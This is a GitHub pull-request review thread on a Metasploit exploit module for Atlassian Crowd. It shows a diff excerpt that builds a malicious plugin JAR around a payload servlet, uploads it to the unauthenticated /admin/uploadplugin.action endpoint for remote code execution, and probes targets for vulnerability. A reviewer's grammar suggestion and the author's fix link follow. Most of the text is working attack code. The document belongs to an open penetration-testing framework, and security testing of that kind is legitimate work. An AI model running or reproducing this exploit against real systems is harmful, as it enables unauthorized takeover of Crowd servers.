modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb

```diff
@@ -0,0 +1,131 @@
+            ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
+            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
+          ],
+        'Platform' => %w[java],
+        'Arch' => ARCH_JAVA,
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SAFE ]
+          },
+        'Targets' =>
+          [
+            [
+              'Java Universal',
+              {
+                'Arch' => ARCH_JAVA,
+                'Platform' => 'java'
+              }
+            ]
+          ],
+        'DisclosureDate' => '2019-05-22'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8095),
+        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/'])
+      ]
+    )
+  end
+
+  def upload_plugin(content)
+    data = Rex::MIME::Message.new
+    data.add_part(content, nil, nil, "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
+
+    send_request_raw({
+      'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
+      'method' => 'POST',
+      'data' => data.to_s,
+      'ctype' => "multipart/mixed; boundary=#{data.bound}"
+    }, 25)
+  end
+
+  def generate_plugin_jar
+    name = Rex::Text.rand_text_alpha(8..12)
+    servlet_name = Rex::Text.rand_text_alpha(8..12)
+    atlassian_plugin_xml = %(
+        <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
+          <plugin-info>
+            <param name="atlassian-data-center-compatible">true</param>
+            <description></description>
+            <version>1.0.0</version>
+          </plugin-info>
+
+          <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
+            <url-pattern>/#{name}</url-pattern>
+            <description>Calendar App</description>
+          </servlet>
+        </atlassian-plugin>
+      )
+
+    # Generates .jar file for upload
+    zip = payload.encoded_jar
+    zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+    zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+    contents = zip.pack
+    [contents, name]
+  end
+
+  def check
+    print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
+    res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
+    if res.nil?
+      return CheckCode::Unknown('Was not able to connect to the target!')
+    elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
+      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!")
```

Comment:
```suggestion
      return CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
```

This hasn't been corrected yet. :)

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/0d7d5ab93f5b9bd8afcefdd1863054164922084b